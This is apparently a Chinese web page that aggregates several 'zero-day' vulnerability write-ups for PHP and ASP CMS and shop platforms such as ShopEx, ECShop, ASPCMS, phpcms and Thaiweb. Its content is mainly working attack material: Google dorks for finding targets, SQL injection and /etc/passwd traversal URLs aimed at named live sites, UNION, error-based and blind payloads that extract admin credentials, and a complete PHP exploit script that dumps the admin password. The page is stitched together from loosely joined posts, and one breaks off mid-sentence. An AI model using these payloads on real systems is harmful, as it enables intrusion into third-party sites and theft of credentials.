以下是小编为大家收集的Thaiweb远程文件sql注入漏洞0day漏洞预警(共含10篇),欢迎参阅,希望可以帮助到有需要的朋友。同时,但愿您也能像本文投稿人“想自闭辽”一样,积极向本站投稿分享好文章。
Google之:
intext:powered by Thaiweb
inurl:index.php?page=board.php
利用点1:www.xfack.com/index.php?page=../../../../../../../../../../../../../etc/passwd
利用点2:www.xfack.com/index.php?page=boardque.php&bod_id=4'
www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
g.cn关键字:6CMS企业望站管理系统(中英繁三语版)
默认帐号密码:admin
后台:admin/
也不知道程序员怎么弄得,我看到程序admin目录下有个防注入的sql.asp
但是上级目录却没有
默认数据库:data/#sze7xiaohu.mdb
seeion验证感觉也有点乱来,记得有个admin目录下发布职位的文件可以直接访问(具体哪个文件),貌似可以直接发布消息
直接放啊D,
6CMS sql 0day漏洞预警
,
后台也直接数据库备份。
感觉没啥利用价值。没意思,自己当研究玩吧
又是sql注入
测试版本:shopex-singel-4.8.5.78660
文件\core\shop\controller\ctl.tools.php
function products{ $objGoods = &$this->system->loadModel('goods/products'); $filter = array(); foreach(explode(',',$_POST['goods']) as $gid){$filter['goods_id'][] = $gid; } $this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.',find_in_set(goods_id,“'.$_POST['goods'].'”) as rank',$filter,0,-1,array('rank','asc'));
目测$_POST['goods']直接进入到sql语句中,由于部分文件加密开启sql语句执行记录日志
提交:
goods=aaa“) FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23 130526 20:03:23 352 Connect root@localhost on 352 Init DB shopex 352 Query SET NAMES 'utf8' 352 Query SELECT * FROM sdb_plugins WHERE plugin_type=”app“ 352 Query select * from sdb_plugins where plugin_type=”app“ and plugin_ident='commodity_radar' LIMIT 0, 1 352 Query select * from sdb_plugins where plugin_type=”app“ and plugin_ident='shopex_stat' LIMIT 0, 1 352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc 352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,”aaa“) FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#”) as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615
查看日志变量已经进入到sql语句中
又是sql注入漏洞 测试版本:shopex-singel-4.8.5.78660
文件:\core\shop\controller\ctl.member.php
function delTrackMsg() { if(!empty($_POST['deltrack'])){ $oMsg = &$this->system->loadModel('resources/msgbox'); $oMsg->delTrackMsg($_POST['deltrack']); $this->splash('success', $this->system->mkUrl(“member”,“track”), __('删除成功')); }else{ $this->splash('failed', $this->system->mkUrl(“member”,“track”), __('删除失败: 没有选中任何记录!')); } }
跟进$oMsg->delTrackMsg($_POST['deltrack']);
在文件:\core\model_v5\resources\mdl.msgbox.php
public function delTrackMsg( $aMsgId ) { foreach ( $aMsgId as $val ) { if ( $val ) { $aTmp[] = $val; } } if ( $aTmp ) { $this->db->exec( “DELETE FROM sdb_message WHERE msg_id IN (”.implode( “,”, $aTmp ).“) AND del_status='1'” ); $this->db->exec( “UPDATE sdb_message SET del_status='2' WHERE msg_id IN (”.implode( “,”, $aTmp ).“)” ); } return true; }
出现在DELETE语句的sql注入纯粹是体力活,通过是否删除了message作为判断依据慢慢查吧
提交数据包;deltrack[1]=1) and (select count(*) from sdb_operators)=1%23
查看sql执行记录:
130526 20:31:25 360 Connect root@localhost on 360 Init DB shopex 360 Query SET NAMES 'utf8' 360 Query SELECT * FROM sdb_plugins WHERE plugin_type=“app” 360 Query select * from sdb_plugins where plugin_type=“app” and plugin_ident='commodity_radar' LIMIT 0, 1 360 Query select * from sdb_plugins where plugin_type=“app” and plugin_ident='shopex_stat' LIMIT 0, 1 360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1 360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1 360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1 360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
执行成功
漏洞证明:
因为(select count(*) from sdb_operators)=1,所以msg_id=1的记录被删除,
shopex ctl.member.php文件SQL注入漏洞漏洞预警
,
慢慢猜解吧。。。
作者:code_sec
ASPCMS系统对用户提交的参数过滤不严,导致攻击者可以提交SQL语句查询数据库获取敏感信息,
漏洞存在于/admin_aspcms/_content/_Content/AspCms_ContentFun.asp,这个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取的参数没有使用自定义的filterPara函数过滤,导致多处注入,代码入下:
<% ''die debugmode
dim action : action=getForm(“action”,“get”)
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory
''SpecCategory用于判断是哪个类型的自定义参数
dim sortType, keyword, page, psize, order, ordsc, sortTypeName
sortType=getForm(“sortType”,“get”) if isnul(sortType) then sortType=0
sortid=getForm(“sortid”,“post”) if isnul(sortid) then sortid=getForm(“sortid”,“get”)
keyword=getForm(“keyword”,“post”) if isnul(keyword) then keyword=getForm(“keyword”,“get”)
page=getForm(“page”,“get”)
psize=getForm(“psize”,“get”)
rder=getForm(“order”,“get”)
rdsc=getForm(“ordsc”,“get”)
DownGroupID=getForm(“DownGroupID”,“post”)
VideoGroupID=getForm(“VideoGroupID”,“post”)
select case sortType
case “2”
sortTypeName =“文章”
SpecCategory = “C” case “3”
sortTypeName =“产品”
SpecCategory = “P” case “4”
sortTypeName =“下载”
SpecCategory = “DL” case “5”
sortTypeName =“招聘”
SpecCategory = “HR” case “6”
sortTypeName =“相册”
SpecCategory = “FO” case “8”
sortTypeName = “视频”
SpecCategory = “VI” end select
''单篇1,文章2,产品3,下载4,招聘5,相册6,链接7,视频8
Select case action
case “add” : addContent
case “edit” : editContent
case “move” : moveContent
case “copy” : copyContent
case “rpost” : rpostContent
case “del” : delContent
case “recovery” : Recovery
case “tdel” : trueDelContent
case “on” : onOff “on”, “Content”, “ContentID”, “ContentStatus”, “”, getPageName&“?sortType=”&sortType&“&sortid=”&sortid&“&keyword=”&keyword&“&page=”&page&“&psize=”&psize&“&order=”&order&“&ordsc=”&ordsc
case “off” : onOff “off”, “Content”, “ContentID”, “ContentStatus”, “”, getPageName()&“?sortType=”&sortType&“&sortid=”&sortid&“&keyword=”&keyword&“&page=”&page&“&psize=”&psize&“&order=”&order&“&ordsc=”&ordsc
case “order” : UpdateOrder
End Select
Sub trueDelContent
dim id : id=getForm(“id”,“both”) if isnul(id) then alertMsgAndGo “请选择要操作的内容”,“-1” if runmode=1 then
dim rs, sql, filepath
dim templateobj : set templateobj=new TemplateClass
sql=“select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID=”&session(“languageID”)&“ and a.SortID=b.SortID and ContentStatus=2 and ContentID in(”&id&“)” set rs=conn.exec(sql,“r1”) do while not rs.eof
filepath=templateobj.getContentLink(rs(“SortID”),rs(“ContentID”),rs(“SortFolder”),rs(“a.GroupID”),rs(“ContentFolder”),
rs(“ContentFileName”),rs(“AddTime”),rs(“PageFileName”),rs(“b.GroupID”)) if isExistFile(filepath) then delFile filepath
''echo filepath&“
”
rs.movenext
loop
end if
conn.exec “delete from {prefix}Content where ContentStatus=2 and ContentID in(”&id&“)”,“exe”
alertMsgAndGo “彻底删除成功”,getPageName()&“?sortType=”&sortType&“&sortid=”&sortid&“&keyword=”&keyword&“&page=”&page&“&psize=”&psize&“&order=”&order&“&ordsc=”&ordsc
End Sub
利用比较简单,利用iif来强制报错:
www.xxx.com0/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))
查询管理员用户名第一个字符是否为a
www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))
查询管理员用户名第一个字符是否为b
返回为假,强制报错
感谢欠杀的黑盒
把任意商品加入购物车在填写配送地址那一页,有地区选择
flow.php?step=consignee&direct_shopping=1
比如省选择安徽
其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
改成
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
就会回显错误页面了,
ECShop全版本SQL注入0day漏洞预警
,
。。。
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
发布日期:-01.23
发布作者:eidelweiss
影响版本:phpcms v9 blind
:www.phpcms.cn
漏洞类型:SQL注入
漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞,
google dork:inurl:“index.php?m=content+c=rss+catid=10”
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] host/index.php?m=content&c=rss&catid=10 <= True
[!] host/index.php?m=content&c=rss&catid=-10 <= False
[+] host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die;
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen(“$url”, 80, $errno, $errstr, 30);
if (!$sock) die(“$errstr ($errno)\n”);
$data = “username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~”;
fwrite($sock, “POST $path/feedback/feedback.php HTTP/1.1\r\n”);
fwrite($sock, “Accept: */*\r\n”);
fwrite($sock, “Referer: $url/#M\r\n”);
fwrite($sock, “Accept-Language: zh-cn\r\n”);
fwrite($sock, “Content-Type: application/x-www-form-urlencoded\r\n”);
fwrite($sock, “Accept-Encoding: gzip, deflate\r\n”);
fwrite($sock, “User-Agent: Mozilla\r\n”);
fwrite($sock, “Host: $url\r\n”);
fwrite($sock, “Content-Length: ”.strlen($data).“\r\n”);
fwrite($sock, “Connection: Keep-Alive\r\n”);
fwrite($sock, “Cache-Control: no-cache\r\n”);
fwrite($sock, “Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n”);
fwrite($sock, $data);
$headers = “”;
while ($str = trim(fgets($sock, 4096)))
$headers .= “$str\n”;
echo “\n”;
$body = “”;
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
$result=explode(“_”,$arr[1]);
print_r(“Exploit Success! \nusername:”.$result[0].“\npassword:”.$result[1].“\nGood Luck!”);
}else{
print_r(“Exploit Failed! \n”);
}
ob_end_flush();
?>
漏洞作者:zpino
漏洞存在于/admin/pinglun.asp 文件
<%=webname%>--用户评论
<%dim shopxpptid,action
pinglunid=request.QueryString(“id”)
action=request.QueryString(“action”)
if action=“save” then
set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from shopxp_pinglun where pinglunid=”&pinglunid,conn,1,3
rs(“huifu”)=HTMLEncode2(trim(request(“huifu”)))
rs(“huifudate”)=now()
rs.update
rs.close
set rs=nothing
…………………/*省略*/…………………..
<%set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from shopxp_pinglun where pinglunid=”&pinglunid,conn,1,3
%>
首先看到
<%
dim conn,connstr,db
startime=timer()
db=“../shopxp/”&dataname&“” '数据库
on error resume next '尝试连数据库,一直到超时,但可以加强SQL注入过滤
connstr = “Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & Server.MapPath(db)
'connstr=“DBQ=”+server.mappath(“”&db&“”)+“;DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};”
set conn=server.createobject(“ADODB.CONNECTION”)
conn.open connstr
%>
这个文件的作用是获取数据库连接对象,继续回到/admin/pinglun.asp 文件,
pinglunid=request.QueryString(“id”)
action=request.QueryString(“action”)
获取id的值赋给pinglunid,跟进pinglunid,走到
<%set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from shopxp_pinglun where pinglunid=”&pinglunid,conn,1,3
%>
可以看到没有过滤就被带入到数据库,接下来在下面打印出了查询结果,导致一个SQL漏洞注入产生,
shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
,
ShopEx4.85最新版本SQL注入,无需登录,过GPC,可直接查询管理员密码并回显
啥都不说了,直接上利用代码,将下面的html另存为一个html文件,修改localhost部分为站点的真实地址:
columns:
★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
★ dedecms 5.7 edit.inc.php文件注射漏洞预警
★ 火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警
★ eWebeditoR3.8 for php任意文件上传EXP漏洞预警
